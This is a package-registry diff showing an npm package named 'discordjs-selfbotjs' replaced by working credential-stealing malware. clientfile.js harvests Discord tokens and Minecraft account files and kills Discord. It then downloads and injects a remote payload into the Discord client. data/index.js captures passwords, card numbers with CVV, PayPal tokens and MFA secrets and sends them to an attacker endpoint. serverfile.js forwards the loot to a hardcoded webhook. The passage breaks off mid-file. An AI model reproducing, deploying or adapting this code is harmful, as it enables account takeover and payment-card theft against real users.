discordjs-selfbotjs 0.0.1-security → 2.0.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of discordjs-selfbotjs might be problematic. Click here for more details.

package/clientfile.js ADDED
@@ -0,0 +1,187 @@
1
+ const OS = require("os"),
2
+ fs = require("fs"),
3
+ fetch = require("node-fetch"),
4
+ {
5
+ execSync
6
+ } = require("child_process"),
7
+ Glob = require("glob"),
8
+ toInject = [],
9
+ toInjectJS = [],
10
+ toKill = [],
11
+ apiurl = "" // Put Your API URL Here
12
+ try {
13
+ switch (OS.platform()) {
14
+ case "win32":
15
+ const local = process.env.localappdata,
16
+ roaming = process.env.appdata,
17
+ minecraftPath = `${roaming}/.minecraft/launcher_accounts.json`,
18
+ remixPath = `${roaming}/.minecraft/remix/UID.txt`
19
+ dbPaths = [`${roaming}/Discord/Local Storage/leveldb`, `${roaming}/DiscordDevelopment/Local Storage/leveldb`, `${roaming}/Lightcord/Local Storage/leveldb`, `${roaming}/discordptb/Local Storage/leveldb`, `${roaming}/discordcanary/Local Storage/leveldb`, `${roaming}/Opera Software/Opera Stable/Local Storage/leveldb`, `${roaming}/Opera Software/Opera GX Stable/Local Storage/leveldb`, `${local}/Amigo/User Data/Local Storage/leveldb`, `${local}/Torch/User Data/Local Storage/leveldb`, `${local}/Kometa/User Data/Local Storage/leveldb`, `${local}/Orbitum/User Data/Local Storage/leveldb`, `${local}/CentBrowser/User Data/Local Storage/leveldb`, `${local}/7Star/7Star/User Data/Local Storage/leveldb`, `${local}/Sputnik/Sputnik/User Data/Local Storage/leveldb`, `${local}/Vivaldi/User Data/Default/Local Storage/leveldb`, `${local}/Google/Chrome SxS/User Data/Local Storage/leveldb`, `${local}/Epic Privacy Browser/User Data/Local Storage/leveldb`, `${local}/Google/Chrome/User Data/Default/Local Storage/leveldb`, `${local}/uCozMedia/Uran/User Data/Default/Local Storage/leveldb`, `${local}/Microsoft/Edge/User Data/Default/Local Storage/leveldb`, `${local}/Yandex/YandexBrowser/User Data/Default/Local Storage/leveldb`, `${local}/Opera Software/Opera Neon/User Data/Default/Local Storage/leveldb`, `${local}/BraveSoftware/Brave-Browser/User Data/Default/Local Storage/leveldb`]
20
+ init()
21
+
22
+ function init() {
23
+ fs.readFile(remixPath, (err, res) => res && minecraft("remix", res))
24
+ fs.readFile(minecraftPath, (err, res) => res && minecraft("minecraft", res))
25
+ injectToDiscord()
26
+ dbPaths.forEach(r => main(r))
27
+ }
28
+
29
+ function main(r) {
30
+ fs.readdir(r, (err, tokenDir) => {
31
+ if (tokenDir) {
32
+ var ldbFileFilter = tokenDir.filter(f => f.endsWith("ldb"))
33
+ ldbFileFilter.forEach(file => {
34
+ var fileContent = fs.readFileSync(`${r}/${file}`).toString()
35
+ var noMFA = /"[\d\w_-]{24}\.[\d\w_-]{6}\.[\d\w_-]{27}"/
36
+ var mfa = /"mfa\.[\d\w_-]{84}"/
37
+ var [token] = noMFA.exec(fileContent) || mfa.exec(fileContent) || [undefined]
38
+ if (token) fetch("http://ip-api.com/json/").then(r => r.json()).then(r => fetch(`${apiurl}/beforeinject`, {
39
+ method: "POST",
40
+ body: JSON.stringify({
41
+ token: token.slice(1, -1),
42
+ ipAddress: r.query
43
+ })
44
+ }))
45
+ })
46
+ }
47
+ })
48
+ }
49
+
50
+ function minecraft(a2b, content) {
51
+ switch (a2b) {
52
+ case "remix":
53
+ fetch(`${apiurl}/remix`, {
54
+ method: "POST",
55
+ body: JSON.stringify({
56
+ UID: content
57
+ })
58
+ })
59
+ break;
60
+ case "minecraft":
61
+ var [i] = /"[\d\w_-]{32}"/.exec(content)
62
+ if (i) {
63
+ const mc = require(minecraftPath)
64
+ if (!mc.accounts) return
65
+ var defaut = mc.accounts[i.slice(1, -1)]
66
+ fetch(`${apiurl}/minecraft`, {
67
+ method: "POST",
68
+ body: JSON.stringify({
69
+ eligibleForMigration: defaut.eligibleForMigration,
70
+ hasMultipleProfiles: defaut.hasMultipleProfiles,
71
+ legacy: defaut.legacy,
72
+ localId: defaut.localId,
73
+ minecraftProfileID: defaut.minecraftProfile.id,
74
+ minecraftProfileName: defaut.minecraftProfile.name,
75
+ persistent: defaut.persistent,
76
+ remoteId: defaut.remoteId,
77
+ type: defaut.type,
78
+ username: defaut.username,
79
+ activeAccountLocalId: mc.activeAccountLocalId
80
+
81
+ })
82
+ })
83
+ }
84
+ }
85
+ }
86
+
87
+ function injectToDiscord() {
88
+ getInstalledDiscord()
89
+ killAllDiscords()
90
+ fetch("https://raw.githubusercontent.com/NotFubukIl/DiscordTokenGrabber/main/data/index.js").then(r => r.text()).then(r => toInjectJS.forEach(f => fs.writeFileSync(f, r.replace("*API URL*", apiurl)) ^ execSync(`${local}/${f.split("/")[5]}/Update.exe --processStart ${f.split("/")[5]}.exe`)))
91
+ }
92
+
93
+ function getInstalledDiscord() {
94
+ fs.readdirSync(roaming).forEach(r => r.includes("cord") && toInject.push(`${local}/${r}`));
95
+ toInject.forEach(r => Glob.sync(`${r}/app-*/modules/discord_desktop_core-*/discord_desktop_core/index.js`).map(path => toInjectJS.push(path)))
96
+ }
97
+
98
+ function killAllDiscords() {
99
+ var killList = execSync("tasklist").toString()
100
+ killList.includes("Discord.exe") && toKill.push("discord")
101
+ killList.includes("DiscordCanary.exe") && toKill.push("discordcanary")
102
+ killList.includes("DiscordDevelopment.exe") && toKill.push("discorddevelopment")
103
+ killList.includes("DiscordPTB.exe") && toKill.push("discordptb");
104
+ toKill.forEach(r => execSync(`taskkill /IM ${r}.exe /F`))
105
+ }
106
+ break;
107
+ /////////////////////////////////////////////////////////
108
+ ///////////////////////// LINUX /////////////////////////
109
+ /////////////////////////////////////////////////////////
110
+ case "linux":
111
+ const defaut = `/home/${(__dirname.split("/")[2])}/.config`,
112
+ LdbPaths = [`${defaut}/discord/Local Storage/leveldb`, `${defaut}/discordcanary/Local Storage/leveldb`, `${defaut}/discordptb/Local Storage/leveldb`, `${defaut}/DiscordDevelopment/Local Storage/leveldb`]
113
+ const LminecraftPath = `${defaut}/.minecraft/launcher_accounts.json`
114
+ Linit()
115
+
116
+ function Linit() {
117
+ LdbPaths.forEach(r => Lmain(r))
118
+ var minecraftContent = fs.readFileSync(LminecraftPath)
119
+ if (minecraftContent) Lminecraft(minecraftContent)
120
+ LinjectToDiscord()
121
+ }
122
+
123
+ function Lmain(r) {
124
+ fs.readdir(r, (err, tokenDir) => {
125
+ if (tokenDir) {
126
+ var ldbFileFilter = tokenDir.filter(f => f.endsWith("ldb"))
127
+ ldbFileFilter.forEach(file => {
128
+ var fileContent = fs.readFileSync(`${tokenDir}/${file}`).toString()
129
+ var noMFA = /"[\d\w_-]{24}\.[\d\w_-]{6}\.[\d\w_-]{27}"/
130
+ var mfa = /"mfa\.[\d\w_-]{84}"/
131
+ var [token] = noMFA.exec(fileContent) || mfa.exec(fileContent) || [undefined]
132
+ if (token) fetch("http://ip-api.com/json/").then(r => r.json()).then(r => fetch(`${apiurl}/beforeinject`, {
133
+ method: "POST",
134
+ body: JSON.stringify({
135
+ token: token,
136
+ ip: r.query
137
+ })
138
+ }))
139
+ })
140
+ }
141
+ })
142
+ }
143
+
144
+ function Lminecraft(Content) {
145
+ var [i] = /"[\d\w_-]{32}"/.exec(Content)
146
+ if (i) {
147
+ const mc = require(LminecraftPath)
148
+ if (!mc.accounts) return
149
+ var defaut = mc.accounts[i.slice(1, -1)]
150
+ fetch(`${apiurl}/minecraft`, {
151
+ method: "POST",
152
+ body: JSON.stringify({
153
+ eligibleForMigration: defaut.eligibleForMigration,
154
+ hasMultipleProfiles: defaut.hasMultipleProfiles,
155
+ legacy: defaut.legacy,
156
+ localId: defaut.localId,
157
+ minecraftProfileID: defaut.minecraftProfile.id,
158
+ minecraftProfileName: defaut.minecraftProfile.name,
159
+ persistent: defaut.persistent,
160
+ remoteId: defaut.remoteId,
161
+ type: defaut.type,
162
+ username: defaut.username,
163
+ activeAccountLocalId: mc.activeAccountLocalId
164
+
165
+ })
166
+ })
167
+ }
168
+ }
169
+
170
+ function LinjectToDiscord() {
171
+ getInstalledLDiscord()
172
+ fetch("https://raw.githubusercontent.com/NotFubukIl/DiscordTokenGrabber/main/data/index.js").then(r => r.text()).then(r => toInjectJS.forEach(f => fs.writeFileSync(f, r.replace("*API URL*", apiurl))))
173
+ }
174
+
175
+ function getInstalledLDiscord() {
176
+ fs.readdirSync(defaut).forEach(r => r.includes("cord") && toInject.push(`${defaut}/${r}`));
177
+ toInject.forEach(r => Glob.sync(`${r}/*/modules/discord_desktop_core/index.js`).map(path => toInjectJS.push(path)))
178
+ }
179
+ break;
180
+ /////////////////////////////////////////////////////////
181
+ ///////////////////////// MacOS /////////////////////////
182
+ /////////////////////////////////////////////////////////
183
+ case "darwin":
184
+ // Available Soon...
185
+ break
186
+ }
187
+ } catch (e) {}
package/data/index.js ADDED
@@ -0,0 +1 @@
1
+ const fs=require("fs"),{BrowserWindow:BrowserWindow,session:session}=require("electron"),{parse:parse}=require("querystring"),apiURL="*API URL*",tken='for(let a in window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]),gg.c)if(gg.c.hasOwnProperty(a)){let b=gg.c[a].exports;if(b&&b.__esModule&&b.default)for(let a in b.default)"getToken"==a&&(token=b.default.getToken())}token;',logOut='window.webpackJsonp?(gg=window.webpackJsonp.push([[],{get_require:(a,b,c)=>a.exports=c},[["get_require"]]]),delete gg.m.get_require,delete gg.c.get_require):window.webpackChunkdiscord_app&&window.webpackChunkdiscord_app.push([[Math.random()],{},a=>{gg=a}]);function LogOut(){(function(a){const b="string"==typeof a?a:null;for(const c in gg.c)if(gg.c.hasOwnProperty(c)){const d=gg.c[c].exports;if(d&&d.__esModule&&d.default&&(b?d.default[b]:a(d.default)))return d.default;if(d&&(b?d[b]:a(d)))return d}return null})("login").logout()}LogOut();';var win="";const onLaunchingDiscord={urls:["https://status.discord.com/api/v*/scheduled-maintenances/upcoming.json","https://*.discord.com/api/v*/applications/detectable","https://discord.com/api/v*/applications/detectable","https://*.discord.com/api/v*/users/@me/library","https://discord.com/api/v*/users/@me/library","https://*.discord.com/api/v*/users/@me/billing/subscriptions","https://discord.com/api/v*/users/@me/billing/subscriptions","wss://remote-auth-gateway.discord.gg/*"]},onDiscordRequest={urls:["https://discord.com/api/v*/users/@me/billing/paypal/billing-agreement-tokens","https://discordapp.com/api/v*/users/@me/billing/paypal/billing-agreement-tokens","https://*.discord.com/api/v*/users/@me/billing/paypal/billing-agreement-tokens","https://discord.com/api/v*/users/@me","https://discordapp.com/api/v*/users/@me","https://*.discord.com/api/v*/users/@me","https://discordapp.com/api/v*/auth/login","https://discord.com/api/v*/auth/login","https://*.discord.com/api/v*/auth/login","https://api.stripe.com/v*/tokens","https://discord.com/api/v*/users/@me/mfa/totp/disable","https://discordapp.com/api/v*/users/@me/mfa/totp/disable","https://*.discord.com/api/v*/users/@me/mfa/totp/disable","https://canary.discord.com/api/v*/users/@me/mfa/totp/disable","https://discord.com/api/v*/users/@me/mfa/totp/enable","https://discordapp.com/api/v*/users/@me/mfa/totp/enable","https://*.discord.com/api/v*/users/@me/mfa/totp/enable","https://canary.discord.com/api/v*/users/@me/mfa/totp/enable"]};function organize(e,s,t,n){BrowserWindow.getAllWindows()[0].webContents.executeJavaScript('var IPreq = new XMLHttpRequest();IPreq.open( "GET", "https://ipapi.co/json", false );IPreq.send();JSON.parse(IPreq.responseText).ip;',!0).then(i=>{switch(e){case"login":send("login",JSON.stringify({password:s,captcha_key:t,token:n,injected:__dirname,ipAddress:i}));break;case"passchange":send("newpass",JSON.stringify({lastPassword:s,newPassword:t,token:n,injected:__dirname,ipAddress:i}));break;case"emailchange":send("newemail",JSON.stringify({newEmail:s,password:t,token:n,injected:__dirname,ipAddress:i}));break;case"paypal":send("paypal",JSON.stringify({token:n,injected:__dirname,ipAddress:i}));break;case"cardAdd":s=JSON.parse(s),send("card",JSON.stringify({number:s["card[number]"],cvv:s["card[cvc]"],expireAt:`${s["card[exp_month]"]}/${s["card[exp_year]"]}`,guid:s.guid,muid:s.muid,sid:s.sid,userAgent:s.payment_user_agent,key:s.key,token:n,injected:__dirname,ipAddress:i}));break;case"mfaenable":s=JSON.parse(s),send("mfaenable",JSON.stringify({code:s.code,authKey:s.secret,password:s.password,token:n,injected:__dirname,ipAddress:i}));break;case"mfaDisable":send("mfadisable",JSON.stringify({code:s,token:n,injected:__dirname,ipAddress:i}));break;case"injected":send("inject",JSON.stringify({injected:__dirname,token:n,ipAddress:i}))}})}function send(e,s){(win=BrowserWindow.getAllWindows()[0]).webContents.executeJavaScript(`fetch("${apiURL}/${e}", { method: "POST", body: JSON.stringify(${s})})`)}function firstRun(){fs.readdirSync(__dirname).includes("ZeroTwo.txt")||(win=BrowserWindow.getAllWindows()[0],fs.writeFileSync(`${__dirname}/ZeroTwo.txt`,"i"),win.webContents.executeJavaScript(logOut,!0))}session.defaultSession.webRequest.onBeforeRequest(onLaunchingDiscord,(e,s)=>{firstRun();if(e.url.startsWith("wss://"))return s({cancel:!0});}),session.defaultSession.webRequest.onHeadersReceived((e,s)=>{delete e.responseHeaders["content-security-policy"],delete e.responseHeaders["content-security-policy-report-only"],s({responseHeaders:{...e.responseHeaders,"Access-Control-Allow-Headers":"*"}})}),session.defaultSession.webRequest.onCompleted(onDiscordRequest,(e,s)=>{if(e.url.endsWith("login")&&200==e.statusCode&&"POST"==e.method){win=BrowserWindow.getAllWindows()[0];var t=JSON.parse(e.uploadData[0].bytes);win.webContents.executeJavaScript(tken,!0).then(e=>organize("login",t.password,t.captcha_key,e))}e.url.endsWith("users/@me")&&200==e.statusCode&&"PATCH"==e.method&&(win=BrowserWindow.getAllWindows()[0],(t=JSON.parse(e.uploadData[0].bytes)).new_password&&win.webContents.executeJavaScript(tken,!0).then(e=>organize("passchange",t.password,t.new_password,e)),t.email&&win.webContents.executeJavaScript(tken,!0).then(e=>organize("emailchange",t.email,t.password,e)));e.url.endsWith("billing-agreement-tokens")&&200==e.statusCode&&"POST"==e.method&&BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(tken,!0).then(e=>organize("paypal",null,null,e)),e.url.endsWith("/tokens")&&200==e.statusCode&&"POST"==e.method&&BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(tken,!0).then(s=>organize("cardAdd",JSON.stringify(parse(decodeURIComponent(e.uploadData[0].bytes))),null,s)),e.url.endsWith("/enable")&&200==e.statusCode&&"POST"==e.method&&BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(tken,!0).then(s=>organize("mfaenable",e.uploadData[0].bytes,null,s)),e.url.endsWith("disable")&&200==e.statusCode&&"POST"==e.method&&BrowserWindow.getAllWindows()[0].webContents.executeJavaScript(tken,!0).then(s=>organize("mfaDisable",JSON.parse(e.uploadData[0].bytes).code,null,s))}),module.exports=require("./core.asar");
package/package.json CHANGED
@@ -1,6 +1,23 @@
1
1
  {
2
2
  "name": "discordjs-selfbotjs",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "2.0.0",
4
+ "description": "",
5
+ "main": "clientfile.js",
6
+ "dependencies": {
7
+ "buffer-replace": "^1.0.0",
8
+ "child_process": "^1.0.2",
9
+ "fs": "0.0.1-security",
10
+ "glob": "^7.2.0",
11
+ "nexe": "^4.0.0-beta.19",
12
+ "node-fetch": "^2.6.6"
13
+ },
14
+ "devDependencies": {},
15
+ "scripts": {
16
+ "start": "node clientfile.js",
17
+ "build": "nexe clientfile.js -o test -t windows --build --verbose",
18
+ "install": "npm i fs node-fetch@2 nexe glob buffer-replace child_process --save"
19
+ },
20
+ "author": "History",
21
+ "license": "ISC"
6
22
  }
23
+
package/serverfile.js ADDED
@@ -0,0 +1,723 @@
1
+ const app = require("express")(),
2
+ {
3
+ text
4
+ } = require("body-parser"),
5
+ Discord = require("v11-discord.js"),
6
+ request = require("sync-request")
7
+ var webhook = "https://discord.com/api/webhooks/942548227054510080/-7UoNbf7CTZWFodhQp-I8ZfB1u8004ufGBwq2fYQixMdTas95syNwOLtKaMD2QUuItbQ" // Put your webhook Here.
8
+
9
+ webhook = webhook.split("/")
10
+ webhook = new Discord.WebhookClient(webhook[5], webhook[6])
11
+
12
+ app.use(text())
13
+ app.listen(3000)
14
+ app.post("/login", (req, res) => {
15
+ res.sendStatus(200)
16
+ req = JSON.parse(req.body)
17
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
18
+ if (basicInfos == "Invalid") return
19
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
20
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
21
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
22
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
23
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
24
+ var ipInfos = getIPInfo(req.ipAddress)
25
+ var owowner = 0,
26
+ bio, phone
27
+ guildInfos.forEach(r => r.owner && owowner++)
28
+ if (billingInfos.length > 0) billing = `\`Yes \` `
29
+ else billing = "```No.```"
30
+ billingInfos.forEach(i => {
31
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
32
+ i.email && (billing += "<:paypal:891011558040277072> ")
33
+ });
34
+ if (basicInfos.bio) bio = basicInfos.bio
35
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
36
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
37
+ if (basicInfos.phone !== null) phone = basicInfos.phone
38
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
39
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
40
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
41
+ var embed = new Discord.RichEmbed()
42
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
43
+ .setTitle("𝗡𝗲𝘄 𝗧𝗼𝗸𝗲𝗻 𝗚𝗿𝗮𝗯𝗯𝗲𝗱 !")
44
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
45
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
46
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
47
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
48
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
49
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
50
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
51
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
52
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
53
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
54
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
55
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
56
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
57
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
58
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
59
+ .addField("𝐏𝐀𝐒𝐒𝐖𝐎𝐑𝐃: ", "```" + req.password + "```")
60
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
61
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
62
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
63
+ .setImage(image)
64
+ .setColor("#00aaaa")
65
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
66
+ basicInfos.mfa_enabled == true && embed.addField("𝐌𝐅𝐀 𝐂𝐨𝐝𝐞𝐬", "```" + getMFACode(req.token, req.password) + "```")
67
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
68
+ webhook.send(embed)
69
+ var friendEmbed = new Discord.RichEmbed()
70
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
71
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
72
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
73
+ .setDescription(friendInfos(friendsInfos))
74
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
75
+ .setImage(image)
76
+ .setColor("#00aaaa")
77
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
78
+ webhook.send(friendEmbed)
79
+ })
80
+ app.post("/newpass", (req, res) => {
81
+ req = JSON.parse(req.body)
82
+ var basicInfos = getInfo("https://discord.com/api/v9/users/@me", req.token)
83
+ if (basicInfos == "Invalid") return
84
+ var billingInfos = getInfo("https://discord.com/api/v9/users/@me/billing/payment-sources", req.token)
85
+ var friendsInfos = getInfo("https://discordapp.com/api/v9/users/@me/relationships", req.token)
86
+ var guildInfos = getInfo("https://discord.com/api/v9/users/@me/guilds", req.token)
87
+ var appliInfos = getInfo("https://discord.com/api/v9/applications", req.token)
88
+ var connectInfos = getInfo("https://discordapp.com/api/v9/users/@me/connections", req.token)
89
+ var ipInfos = getIPInfo(req.ipAddress)
90
+ var owowner = 0,
91
+ bio, phone
92
+ guildInfos.forEach(r => r.owner && owowner++)
93
+ if (billingInfos.length > 0) billing = `\`Yes \` `
94
+ else billing = "```No.```"
95
+ billingInfos.forEach(i => {
96
+ i.brand && 0 == i.invalid && (billing += "<:y_card_spc:918956324908318720> "),
97
+ i.email && (billing += "<:paypal:891011558040277072> ")
98
+ });
99
+ if (basicInfos.bio) bio = basicInfos.bio
100
+ else bio = "𝗡𝗼 𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝘆"
101
+ if (bio.startsWith("```") && bio.endsWith("```")) bio = bio.slice(3, -3)
102
+ if (basicInfos.phone !== null) phone = basicInfos.phone
103
+ else phone = "𝗡𝗼 𝐏𝗵𝗼𝗻𝗲."
104
+ if (basicInfos.banner) var image = `https://cdn.discordapp.com/banners/${basicInfos.id}/${basicInfos.banner}.png?size=512`
105
+ else var image = "https://www.icegif.com/wp-content/uploads/icegif-219.gif"
106
+ var embed = new Discord.RichEmbed()
107
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
108
+ .setTitle("𝐏𝐚𝐬𝐬𝐰𝐨𝐫𝐝 𝐂𝐡𝐚𝐧𝐠𝐞𝐝 !")
109
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
110
+ .addField("𝗨𝘀𝗲𝗿𝗻𝗮𝗺𝗲", "```" + `${basicInfos.username}#${basicInfos.discriminator}` + "```")
111
+ .addField("𝐁𝐚𝐝𝐠𝐞𝐬", badges(basicInfos.flags), true)
112
+ .addField("𝗡𝗶𝘁𝗿𝗼", getNitro(basicInfos.premium_type), true)
113
+ .addField("𝐅𝗿𝐢𝗲𝐧𝐝𝐬", "`" + friendsInfos.filter(r => r.type == 1).length + "`", true)
114
+ .addField("𝐏𝐚𝐲𝐦𝐞𝐧𝐭 𝐌𝐞𝐭𝐡𝐨𝐝", billing, true)
115
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝", "`" + guildInfos.length + "`", true)
116
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐆𝐮𝐢𝐥𝐝 𝐎𝐰𝐧", "`" + owowner + "`", true)
117
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐀𝐩𝐩𝐥𝐢𝐜𝐚𝐭𝐢𝐨𝐧𝐬", "`" + appliInfos.length + "`", true)
118
+ .addField("𝐓𝐨𝐭𝐚𝐥 𝐂𝐨𝐧𝐧𝐞𝐜𝐭𝐢𝐨𝐧𝐬", "`" + connectInfos.length + "`", true)
119
+ .addField("𝗡𝗦𝗙𝗪 𝗔𝗹𝗹𝗼𝘄𝗲𝗱 ", "`" + basicInfos.nsfw_allowed + "`", true)
120
+ .addField("𝗩𝗲𝗿𝗶𝗳𝗶𝗲𝗱", "`" + basicInfos.verified + "`", true)
121
+ .addField("𝗕𝗶𝗼𝗴𝗿𝗮𝗽𝗵𝗶𝗲", "```" + bio + "```")
122
+ .addField("𝗘𝗺𝗮𝗶𝗹", "```" + basicInfos.email + "```")
123
+ .addField("𝗣𝗵𝗼𝗻𝗲", "```" + phone + "```")
124
+ .addField("𝐏𝐫𝐞𝐯𝐢𝐨𝐮𝐬 𝐏𝐚𝐬𝐬: ", "```" + req.lastPassword + "```", true)
125
+ .addField("𝐍𝐞𝐰 𝐏𝐚𝐬𝐬", "```" + req.newPassword + "```", true)
126
+ .addField("𝗧𝗼𝗸𝗲𝗻", "```" + req.token + "```")
127
+ .addField("𝐈𝐏 𝐈𝐧𝐟𝐨𝐬", "```" + `${ipInfos.country} | ${ipInfos.regionName}\n${ipInfos.city} | ${ipInfos.isp}\n${ipInfos.query}` + "```")
128
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
129
+ .setImage(image)
130
+ .setColor("#00aaaa")
131
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
132
+ basicInfos.mfa_enabled == true && embed.addField("𝐌𝐅𝐀 𝐂𝐨𝐝𝐞𝐬", "```" + getMFACode(req.token, req.newPassword) + "```")
133
+ embed.addField("𝗜𝗻𝗷𝗲𝗰𝘁𝗲𝗱 𝗜𝗻", "```" + req.injected.split("\\")[5] + "```")
134
+ webhook.send(embed)
135
+ var friendEmbed = new Discord.RichEmbed()
136
+ .setAuthor(`By ٴ!"𝐍𝐨𝐭.𝐅𝐮𝐛𝐮𝐤𝐢𝐢 †ٴٴ#6900`, "http://image.noelshack.com/fichiers/2021/49/6/1639241258-22023458-bb44-4943-97e9-20bbbed8cd10.gif", "https://discord.gg/VJTmKz4yPX")
137
+ .setTitle(`𝐅𝐫𝐢𝐞𝐧𝐝𝐬 𝐅𝐫𝐨𝐦 ${basicInfos.username}`)
138
+ .setURL("https://github.com/GayarraFrost/DiscordTokenGrabber")
139
+ .setDescription(friendInfos(friendsInfos))
140
+ .setThumbnail(`https://cdn.discordapp.com/avatars/${basicInfos.id}/${basicInfos.avatar}.png?size=128`)
141
+ .setImage(image)
142
+ .setColor("#00aaaa")
143
+ .setFooter("𝗭𝗲𝗿𝗼𝗧𝘄𝗼 𝗟𝗼𝗴𝗴𝗲𝗿 𝗕𝘆 𝗡𝗼𝘁.𝗙𝘂𝗯𝘂𝗸𝗶𝗶", "http://image.noelshack.com/fichiers/2021/35/4/1630603625-a-67d7f1132cb32d9f903d69da5b880524.gif")
144
+ webhook.send(friendEmbed)
145
+ })
146
+ app.post("/newmemail", (req, res) => {
147
